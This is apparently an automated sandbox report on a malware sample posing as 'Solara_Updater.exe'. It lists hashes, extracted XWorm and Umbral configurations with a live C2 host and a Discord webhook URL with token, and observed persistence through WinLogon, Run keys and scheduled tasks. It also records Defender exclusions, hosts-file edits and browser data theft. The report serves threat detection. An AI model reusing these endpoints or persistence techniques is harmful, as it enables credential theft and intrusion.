Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
19-05-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
Solara_Updater.exe
Resource
win7-20240508-en
General
-
Target
Solara_Updater.exe
-
Size
1.9MB
-
MD5
f4cffd7e6cca2b88bba1f19120e9255f
-
SHA1
28df62794d325206d1f61a400b5c5c682632e371
-
SHA256
4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
-
SHA512
cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
-
SSDEEP
49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i
Malware Config
Extracted
xworm
answer-riverside.gl.at.ply.gg:45691
-
Install_directory
%AppData%
-
install_file
svhost.exe
Extracted
umbral
https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V
Signatures
-
Detect Umbral payload 7 IoCs
resource yara_rule behavioral1/files/0x0008000000014508-40.dat family_umbral behavioral1/memory/2816-42-0x0000000000BA0000-0x0000000000BE0000-memory.dmp family_umbral behavioral1/memory/2828-126-0x0000000000320000-0x0000000000360000-memory.dmp family_umbral behavioral1/memory/2040-197-0x0000000001350000-0x0000000001390000-memory.dmp family_umbral behavioral1/memory/2396-377-0x0000000000310000-0x0000000000350000-memory.dmp family_umbral behavioral1/memory/2720-431-0x0000000000F50000-0x0000000000F90000-memory.dmp family_umbral behavioral1/memory/1080-516-0x00000000001E0000-0x0000000000220000-memory.dmp family_umbral -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000014415-37.dat family_xworm behavioral1/memory/2020-39-0x0000000001190000-0x00000000011A6000-memory.dmp family_xworm behavioral1/memory/2440-226-0x00000000012C0000-0x00000000012D6000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\", \"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\", \"C:\\hostNet\\wscript.exe\"" bridgeblockportComBroker.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2480 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2928 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1964 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 468 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2872 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2352 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 884 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 848 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 448 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1100 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1812 2596 schtasks.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 2596 schtasks.exe 32 -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 544 powershell.exe 2080 powershell.exe 1728 powershell.exe 1596 powershell.exe 2328 powershell.exe 1564 powershell.exe 2748 powershell.exe 1912 powershell.exe 2436 powershell.exe -
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe File opened for modification C:\Windows\System32\drivers\etc\hosts RustCheat.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 1332 Loader.exe 2888 sol.exe 2552 Loader.exe 2632 sol.exe 2020 XClient.exe 2816 RustCheat.exe 1488 Loader.exe 1808 sol.exe 2376 XClient.exe 1544 RustCheat.exe 2828 RustCheat.exe 2644 XClient.exe 2616 Loader.exe 800 sol.exe 2204 Loader.exe 2196 sol.exe 1256 XClient.exe 2476 RustCheat.exe 1516 Loader.exe 3044 sol.exe 2040 RustCheat.exe 2600 XClient.exe 1636 Loader.exe 2160 sol.exe 2716 Loader.exe 1716 sol.exe 2712 Loader.exe 2024 sol.exe 2944 Loader.exe 2632 sol.exe 2440 svhost.exe 1904 Loader.exe 2960 sol.exe 2432 Loader.exe 2000 sol.exe 824 Loader.exe 1064 sol.exe 2300 bridgeblockportComBroker.exe 1692 bridgeblockportComBroker.exe 3052 Loader.exe 1548 sol.exe 1624 bridgeblockportComBroker.exe 1356 Loader.exe 2140 sol.exe 2960 bridgeblockportComBroker.exe 996 Loader.exe 2428 sol.exe 1668 wscript.exe 2864 bridgeblockportComBroker.exe 1952 Loader.exe 344 sol.exe 2160 RustCheat.exe 2156 XClient.exe 308 Loader.exe 2260 sol.exe 2172 bridgeblockportComBroker.exe 2624 bridgeblockportComBroker.exe 1892 Loader.exe 2928 sol.exe 1084 bridgeblockportComBroker.exe 1060 sol.exe 1500 Loader.exe 2868 bridgeblockportComBroker.exe 3056 Loader.exe -
Loads dropped DLL 59 IoCs
pid Process 1596 cmd.exe 1596 cmd.exe 2148 cmd.exe 2532 cmd.exe 2324 cmd.exe 568 cmd.exe 748 cmd.exe 484 cmd.exe 908 cmd.exe 1304 cmd.exe 1080 cmd.exe 2280 cmd.exe 1748 cmd.exe 1568 cmd.exe 2652 cmd.exe 2704 cmd.exe 2864 cmd.exe 2196 cmd.exe 1764 cmd.exe 2068 cmd.exe 1332 cmd.exe 1780 cmd.exe 2744 cmd.exe 2984 cmd.exe 2196 cmd.exe 2840 cmd.exe 2192 cmd.exe 1692 cmd.exe 1068 cmd.exe 2376 cmd.exe 1660 cmd.exe 2792 cmd.exe 1564 cmd.exe 1580 cmd.exe 2512 cmd.exe 1376 cmd.exe 2172 cmd.exe 2984 cmd.exe 2100 cmd.exe 1516 cmd.exe 300 cmd.exe 2008 cmd.exe 2672 cmd.exe 1896 cmd.exe 2360 cmd.exe 2444 cmd.exe 2932 cmd.exe 1040 cmd.exe 1764 cmd.exe 2400 cmd.exe 2988 cmd.exe 1620 cmd.exe 2228 cmd.exe 2128 cmd.exe 3016 cmd.exe 2540 cmd.exe 2716 cmd.exe 2664 cmd.exe 2276 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\hostNet\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\bridgeblockportComBroker.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\Common Files\\Services\\wscript.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\L2Schemas\\WmiPrvSE.exe\"" bridgeblockportComBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\MCT\\MCT-ZA\\Wallpaper\\smss.exe\"" bridgeblockportComBroker.exe -
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ipinfo.io 33 ip-api.com 58 ip-api.com 72 ip-api.com 74 ip-api.com 2 ip-api.com 7 ip-api.com 17 ip-api.com 29 ipinfo.io 44 ip-api.com 46 ip-api.com 69 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP csc.exe File created \??\c:\Windows\System32\hccjfr.exe csc.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\Services\wscript.exe bridgeblockportComBroker.exe File created C:\Program Files (x86)\Common Files\Services\817c8c8ec737a7 bridgeblockportComBroker.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\L2Schemas\WmiPrvSE.exe bridgeblockportComBroker.exe File opened for modification C:\Windows\L2Schemas\WmiPrvSE.exe bridgeblockportComBroker.exe File created C:\Windows\L2Schemas\24dbde2999530e bridgeblockportComBroker.exe File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe bridgeblockportComBroker.exe File created C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\69ddcba757bf72 bridgeblockportComBroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 448 schtasks.exe 1816 schtasks.exe 2480 schtasks.exe 468 schtasks.exe 3008 schtasks.exe 2988 schtasks.exe 848 schtasks.exe 1100 schtasks.exe 2556 schtasks.exe 2912 schtasks.exe 1964 schtasks.exe 2352 schtasks.exe 884 schtasks.exe 2612 schtasks.exe 2440 schtasks.exe 1812 schtasks.exe 2156 schtasks.exe 2928 schtasks.exe 2872 schtasks.exe -
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1052 wmic.exe 2992 wmic.exe 1780 wmic.exe 2092 wmic.exe 1748 wmic.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 bridgeblockportComBroker.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 bridgeblockportComBroker.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 2672 PING.EXE 484 PING.EXE 2332 PING.EXE 2820 PING.EXE 2860 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2816 RustCheat.exe 1728 powershell.exe 2380 powershell.exe 2332 powershell.exe 720 powershell.exe 268 powershell.exe 1596 powershell.exe 2328 powershell.exe 2748 powershell.exe 1912 powershell.exe 2828 RustCheat.exe 544 powershell.exe 1980 powershell.exe 1712 powershell.exe 2704 powershell.exe 2964 powershell.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe 2300 bridgeblockportComBroker.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1332 Loader.exe Token: SeDebugPrivilege 2020 XClient.exe Token: SeDebugPrivilege 2816 RustCheat.exe Token: SeIncreaseQuotaPrivilege 2004 wmic.exe Token: SeSecurityPrivilege 2004 wmic.exe Token: SeTakeOwnershipPrivilege 2004 wmic.exe Token: SeLoadDriverPrivilege 2004 wmic.exe Token: SeSystemProfilePrivilege 2004 wmic.exe Token: SeSystemtimePrivilege 2004 wmic.exe Token: SeProfSingleProcessPrivilege 2004 wmic.exe Token: SeIncBasePriorityPrivilege 2004 wmic.exe Token: SeCreatePagefilePrivilege 2004 wmic.exe Token: SeBackupPrivilege 2004 wmic.exe Token: SeRestorePrivilege 2004 wmic.exe Token: SeShutdownPrivilege 2004 wmic.exe Token: SeDebugPrivilege 2004 wmic.exe Token: SeSystemEnvironmentPrivilege 2004 wmic.exe Token: SeRemoteShutdownPrivilege 2004 wmic.exe Token: SeUndockPrivilege 2004 wmic.exe Token: SeManageVolumePrivilege 2004 wmic.exe Token: 33 2004 wmic.exe Token: 34 2004 wmic.exe Token: 35 2004 wmic.exe Token: SeIncreaseQuotaPrivilege 2004 wmic.exe Token: SeSecurityPrivilege 2004 wmic.exe Token: SeTakeOwnershipPrivilege 2004 wmic.exe Token: SeLoadDriverPrivilege 2004 wmic.exe Token: SeSystemProfilePrivilege 2004 wmic.exe Token: SeSystemtimePrivilege 2004 wmic.exe Token: SeProfSingleProcessPrivilege 2004 wmic.exe Token: SeIncBasePriorityPrivilege 2004 wmic.exe Token: SeCreatePagefilePrivilege 2004 wmic.exe Token: SeBackupPrivilege 2004 wmic.exe Token: SeRestorePrivilege 2004 wmic.exe Token: SeShutdownPrivilege 2004 wmic.exe Token: SeDebugPrivilege 2004 wmic.exe Token: SeSystemEnvironmentPrivilege 2004 wmic.exe Token: SeRemoteShutdownPrivilege 2004 wmic.exe Token: SeUndockPrivilege 2004 wmic.exe Token: SeManageVolumePrivilege 2004 wmic.exe Token: 33 2004 wmic.exe Token: 34 2004 wmic.exe Token: 35 2004 wmic.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 2552 Loader.exe Token: SeDebugPrivilege 720 powershell.exe Token: SeDebugPrivilege 2376 XClient.exe Token: SeIncreaseQuotaPrivilege 900 wmic.exe Token: SeSecurityPrivilege 900 wmic.exe Token: SeTakeOwnershipPrivilege 900 wmic.exe Token: SeLoadDriverPrivilege 900 wmic.exe Token: SeSystemProfilePrivilege 900 wmic.exe Token: SeSystemtimePrivilege 900 wmic.exe Token: SeProfSingleProcessPrivilege 900 wmic.exe Token: SeIncBasePriorityPrivilege 900 wmic.exe Token: SeCreatePagefilePrivilege 900 wmic.exe Token: SeBackupPrivilege 900 wmic.exe Token: SeRestorePrivilege 900 wmic.exe Token: SeShutdownPrivilege 900 wmic.exe Token: SeDebugPrivilege 900 wmic.exe Token: SeSystemEnvironmentPrivilege 900 wmic.exe Token: SeRemoteShutdownPrivilege 900 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2204 wrote to memory of 1332 2204 Solara_Updater.exe 28 PID 2204 wrote to memory of 1332 2204 Solara_Updater.exe 28 PID 2204 wrote to memory of 1332 2204 Solara_Updater.exe 28 PID 2204 wrote to memory of 2888 2204 Solara_Updater.exe 29 PID 2204 wrote to memory of 2888 2204 Solara_Updater.exe 29 PID 2204 wrote to memory of 2888 2204 Solara_Updater.exe 29 PID 2204 wrote to memory of 2888 2204 Solara_Updater.exe 29 PID 2204 wrote to memory of 2364 2204 Solara_Updater.exe 30 PID 2204 wrote to memory of 2364 2204 Solara_Updater.exe 30 PID 2204 wrote to memory of 2364 2204 Solara_Updater.exe 30 PID 2888 wrote to memory of 2664 2888 sol.exe 31 PID 2888 wrote to memory of 2664 2888 sol.exe 31 PID 2888 wrote to memory of 2664 2888 sol.exe 31 PID 2888 wrote to memory of 2664 2888 sol.exe 31 PID 2364 wrote to memory of 2552 2364 Solara_Updater.exe 33 PID 2364 wrote to memory of 2552 2364 Solara_Updater.exe 33 PID 2364 wrote to memory of 2552 2364 Solara_Updater.exe 33 PID 2364 wrote to memory of 2632 2364 Solara_Updater.exe 34 PID 2364 wrote to memory of 2632 2364 Solara_Updater.exe 34 PID 2364 wrote to memory of 2632 2364 Solara_Updater.exe 34 PID 2364 wrote to memory of 2632 2364 Solara_Updater.exe 34 PID 2364 wrote to memory of 1212 2364 Solara_Updater.exe 35 PID 2364 wrote to memory of 1212 2364 Solara_Updater.exe 35 PID 2364 wrote to memory of 1212 2364 Solara_Updater.exe 35 PID 1332 wrote to memory of 2020 1332 Loader.exe 36 PID 1332 wrote to memory of 2020 1332 Loader.exe 36 PID 1332 wrote to memory of 2020 1332 Loader.exe 36 PID 1332 wrote to memory of 2816 1332 Loader.exe 38 PID 1332 wrote to memory of 2816 1332 Loader.exe 38 PID 1332 wrote to memory of 2816 1332 Loader.exe 38 PID 2632 wrote to memory of 2656 2632 sol.exe 37 PID 2632 wrote to memory of 2656 2632 sol.exe 37 PID 2632 wrote to memory of 2656 2632 sol.exe 37 PID 2632 wrote to memory of 2656 2632 sol.exe 37 PID 2816 wrote to memory of 2004 2816 RustCheat.exe 39 PID 2816 wrote to memory of 2004 2816 RustCheat.exe 39 PID 2816 wrote to memory of 2004 2816 RustCheat.exe 39 PID 2816 wrote to memory of 1652 2816 RustCheat.exe 41 PID 2816 wrote to memory of 1652 2816 RustCheat.exe 41 PID 2816 wrote to memory of 1652 2816 RustCheat.exe 41 PID 2816 wrote to memory of 1728 2816 RustCheat.exe 43 PID 2816 wrote to memory of 1728 2816 RustCheat.exe 43 PID 2816 wrote to memory of 1728 2816 RustCheat.exe 43 PID 2816 wrote to memory of 2380 2816 RustCheat.exe 45 PID 2816 wrote to memory of 2380 2816 RustCheat.exe 45 PID 2816 wrote to memory of 2380 2816 RustCheat.exe 45 PID 2816 wrote to memory of 2332 2816 RustCheat.exe 47 PID 2816 wrote to memory of 2332 2816 RustCheat.exe 47 PID 2816 wrote to memory of 2332 2816 RustCheat.exe 47 PID 2816 wrote to memory of 720 2816 RustCheat.exe 49 PID 2816 wrote to memory of 720 2816 RustCheat.exe 49 PID 2816 wrote to memory of 720 2816 RustCheat.exe 49 PID 1212 wrote to memory of 1488 1212 Solara_Updater.exe 51 PID 1212 wrote to memory of 1488 1212 Solara_Updater.exe 51 PID 1212 wrote to memory of 1488 1212 Solara_Updater.exe 51 PID 1212 wrote to memory of 1808 1212 Solara_Updater.exe 52 PID 1212 wrote to memory of 1808 1212 Solara_Updater.exe 52 PID 1212 wrote to memory of 1808 1212 Solara_Updater.exe 52 PID 1212 wrote to memory of 1808 1212 Solara_Updater.exe 52 PID 2552 wrote to memory of 2376 2552 Loader.exe 54 PID 2552 wrote to memory of 2376 2552 Loader.exe 54 PID 2552 wrote to memory of 2376 2552 Loader.exe 54 PID 1212 wrote to memory of 1136 1212 Solara_Updater.exe 53 PID 1212 wrote to memory of 1136 1212 Solara_Updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 1652 attrib.exe 1548 attrib.exe 2916 attrib.exe 1308 attrib.exe 2544 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
